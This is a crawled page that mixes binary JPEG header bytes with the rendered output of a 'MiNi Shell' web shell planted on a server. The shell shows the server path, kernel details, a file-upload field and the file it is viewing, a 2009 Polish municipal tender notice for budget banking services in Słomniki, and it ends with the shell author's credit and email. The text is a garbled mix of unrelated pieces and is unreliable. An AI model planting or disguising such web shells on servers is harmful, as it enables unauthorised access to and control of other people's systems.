JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090410/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090410/101776-N-2009.html

<p class="kh_header"><b>Słomniki: Wykonanie bankowej obsługi budżetu gminy Słomniki oraz podległych jednostek organizacyjnych wraz z uruchomieniem fili lub punktu obsługi w budynku Urzędu Miejskiego w Słomnikach przy ulicy Kościuszki nr 64 w Słomnikach</b><br>
<b>Numer ogłoszenia: 101776 - 2009; data zamieszczenia: 10.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Słomniki , ul. Kościuszki 64, 32-090 Słomniki, woj. małopolskie, tel. 012 3881102, faks 012 3882102.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie bankowej obsługi budżetu gminy Słomniki oraz podległych jednostek organizacyjnych wraz z uruchomieniem fili lub punktu obsługi w budynku Urzędu Miejskiego w Słomnikach przy ulicy Kościuszki nr 64 w Słomnikach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonaniu bankowej obsługi budżetu Gminy Słomniki oraz podległych jednostek organizacyjnych- wskazanych w załączniku nr 7 do umowy- polegającej na :
-	otwarciu i prowadzeniu rachunków bieżących i pomocniczych
-	przyjmowaniu wpłat gotówkowych
-	dokonywanie wypłat gotówkowych
-	realizacji poleceń przelewu , 
-	generowanie i dostarczanie obsługiwanym jednostkom wyciągów bankowych wraz z załącznikami
-	dokonywanie automatycznego lokowania dziennych nadwyżek środków na rachunku
-	przyjmowanie środków finansowych na lokaty krótkoterminowe T/N, IW i 2W
-	przyjmowanie środków finansowych na lokaty dni wolnych weekendowe i świąteczne
-	nie pobieranie prowizji od niewykorzystanego kredytu w ramach przyznanego limitu kredytu w rachunku bieżącym oraz od wykorzystanego kredytu.
-	uruchomienie kredytu , kredytowanie w rachunku bieżącym
-	wydawanie opinii bankowej o prowadzonym rachunku bankowym, oraz innych opinii i zaświadczeń
-	kapitalizacja odsetek na rachunku bieżącym powinna następować w okresach miesięcznych

Obowiązkowe jest uruchomienie fili lub punktu obsługi w budynku Urzędu Miejskiego w Słomnikach przy ulicy Kościuszki nr 64 w Słomnikach w terminie nie dłuższym niż 4 miesiące od dnia podpisania umowy.
Filia lub punkt obsługi będzie czynna/y od poniedziałku do piątku
 w godzinach: od 10:00 do 14:00 

Zamawiający na filię lub punkt obsługi przeznacza lokal użytkowy o powierzchni całkowitej 21,16 m2 mieszczący się w budynku Urzędu Miejskiego w Słomnikach przy ul. Kościuszki.
Z wykonawcą, którego oferta zostanie wybrana zostanie podpisana oddzielna umowa najmu lokalu pod filię lub punkt obsługi -wg zał nr 5 i będzie on ponosił koszty związane z wynajmem lokalu przez cały okres trwania umowy w przedmiotowym postępowaniu.
Miesięczny koszt wynajmu lokalu za 1m2  wynosi 37,00 zł plus 22% vat
Opłata za wynajem lokalu będzie podwyższana od początku każdego roku o stopień inflacji ogłoszony przez Prezesa GUS.
Wykonawca wyposaży i urządzi lokal na własny koszt.

ZASADY WYZNACZENIA PRZEZ OFERENTA POSZCZEGÓLNYCH PARAMETRÓW OFERTY

1.	Stopa oprocentowania środków na rachunku bieżącym powinna być uzależniona    od stopy WIBID Jako iloczyn k x WIBID gdzie oferent podaje współczynnik k Odsetki są naliczane i dopisywane do rachunku ostatniego dnia każdego miesiąca za dany miesiąc WIBID IM bierze się z ostatniego dnia miesiąca poprzedzającego miesiąc , za który dopisywane są odsetki .
2.	Stopy oprocentowania lokat krótkoterminowych powinny być uzależnione
 od stóp WIBID Jako iloczyn s x WIBID , gdzie oferent podaje współczynnik s.
3.	Oferent powinien podać , na podstawie której stopy bazowej będzie wyznaczał stopę
oprocentowania lokat dni wolnych ( WIBID lub inny wskaźnik ), a następnie stopę oprocentowania określić w x ( stopa bazowa ), gdzie oferent podaje współczynnik w.
4.	Stopa oprocentowania kredytu w rachunku bieżącym ulega zmianie w pierwszym dniu kwartału kalendarzowego  i jest stała przez cały kwartał będąc równa sumie WIBOR 3 M + m , gdzie oferent podaje marżę m. WIBOR 3 M dla wyznaczenia tej stopy przyjmuje się na poziomie obowiązującym w pierwszym dniu kwartału .
5.	Wszystkie stopy powinny być podane jako stopy nominalne w skali roku.
6.	Wartości jednostkowe ( prowizje i opłaty ) powinny być tak ustalone , że nie będą podlegać zmianom w okresie obowiązywania umowy.
7.	Oferent nie będzie pobierał opłat za realizację polecenia przelewu, wydanego   przez zamawiającego , na rachunek prowadzony przez oferenta .
8.	Oferent nie będzie pobierał opłat za wypłatę gotówkową z rachunku zamawiającego na rzecz zamawiającego .
9.	Niedopuszczalne jest podawanie prowizji i opłat oraz stóp oprocentowania wariantowo.

W ramach umowy Bank powinien:
1) posiadać zdolność do prowadzenia transakcji dewizowych
2) udostępnić zamawiającemu w siedzibie zamawiającego system bankowości elektronicznej
( nie mniej niż 4 stanowiska komputerowe ) - umożliwiający dokonywanie przelewów
oraz uzyskiwanie informacji o stanie rachunków i dokonywanych operacjach
3) Zapewnić instalacje oprogramowania, przeszkolenie pracowników i świadczenie usług bańkowości elektronicznej we wskazanych jednostkach organizacyjnych gminy umożliwiających dokonywanie przelewów, płatności masowych oraz uzyskiwanie informacji o operacjach bankowych i stanie rachunku.
Za zainstalowanie, korzystanie i za użytkowanie systemu bankowości elektronicznej bank nie będzie pobierał opłat i prowizji. 
Zapewnienie bezpłatnej pomocy technicznej w okresie wdrożenia dla pracowników Urzędu jak i jednostek organizacyjnych pracujących w systemie bankowości elektronicznej.
Zamawiający zastrzega sobie, aby wykonawca gwarantował połączenie bezpłatne lub w
taryfie lokalnej.

4) Świadczyć usługi doradczo-finansowe dla gminy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 66.11.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Warunki udziału w postępowaniu o zamówienie publiczne.
O udzielenie zamówienie mogą ubiegać się wykonawcy potwierdzający spełnienie warunków:

1.1 Posiadający uprawnienia do wykonywania określonej działalności lub czynności,                   jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
1.2 Posiadający niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia; lub którzy przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
 1.3 Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
1.4 Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia. 

2. Ocena spełnienia warunków w postępowaniu o zamówienie publiczne
Z ubiegania się o zamówienia publicznego wyklucza się wykonawców, którzy:
 1 	nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa zamówień publicznych opisanych w ppkt. 1.1 do 1.4, 
 2 	podlegają  wykluczeniu z postępowania na podstawie art. 24 ust. 1 Prawa zamówień publicznych.
 3 	wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności chyba, że udział tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji, 
 4 	złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania, 
 5 	nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków z zastrzeżeniem art. 26 ust. 3, PZP	

3. Zamawiający odrzuca ofertę wykonawcy:
1.	niezgodną z ustawą lub której treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art.87 ust.2 pkt.3 Prawa zamówień publicznych
2.	jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, 
3.	zawierającą rażąco niską cenę w stosunku do przedmiotu zamówienia,  
4.	została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia.
5.	zawiera błędy w obliczeniu ceny 
6.	 wykonawcy który  w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych 
7.	nieważną na podstawie odrębnych przepisów, 

4.Ofertę wykonawcy wykluczonego uznaje się za odrzuconą
5.Zamawiający dokona oceny  spełnienia warunków udziału w postępowaniu na podstawie złożonych wraz z ofertą dokumentów potwierdzających spełnienie warunków.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. Na ofertę składają się następujące dokumenty i załączniki:
      -Formularz ofertowy -  z wykorzystaniem wzoru - załącznik nr 1 do SIWZ 
      - Projekt umowy - bankowa obsługa- parafowany z wykorzystaniem wzoru -    załącznik nr 3 do SIWZ 
       -wykaz osób do kontaktów z Zamawiającym- załącznik nr 4 do SIWZ
      - Projekt umowy -na wynajem lokalu- parafowany z wykorzystaniem wzoru -    załącznik nr 5 do SIWZ 
            - oświadczenie - zał nr 6

B. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Prawa zamówień publicznych składa następujące dokumenty: 
1.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
2.	Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile fakt nie wynika z przedstawionych dokumentów rejestrowych.  
3.	Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne- z wykorzystaniem wzoru - załącznik nr 2 do SIWZ 

C. Dokumenty wymagane w przypadku składania oferty wspólnej: 
Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy

Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę / osoby uprawnione do podpisania oferty z dopiskiem za zgodność z oryginałem.

Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 70</li>
<li>2 - Stopa  oprocentowania środków na rachunku bieżącym - 10</li>
<li>3 - . Stopa oprocentowania lokat krótkoterminowych - 3</li>
<li>4 - Stopa oprocentowania lokat wolnych dni - 3</li>
<li>5 - Stopa oprocentowania kredytu w rachunku bieżącym - 6</li>
<li>6 - Stopa oprocentowania automatycznego lokowania - 5</li>
<li>7 - Minimalna kwota środków lokowanych automatycznie - 3</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.slomniki.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Słomniki, Urząd Miejski w Słomnikach
ul.Kościuszki 64
32-090 Słomniki.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.04.2009 godzina 11:00, miejsce: Gmina Słomniki, Urząd Miejski w Słomnikach
ul. Kościuszki 64
32-090 Słomniki
 dziennik podawczy.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com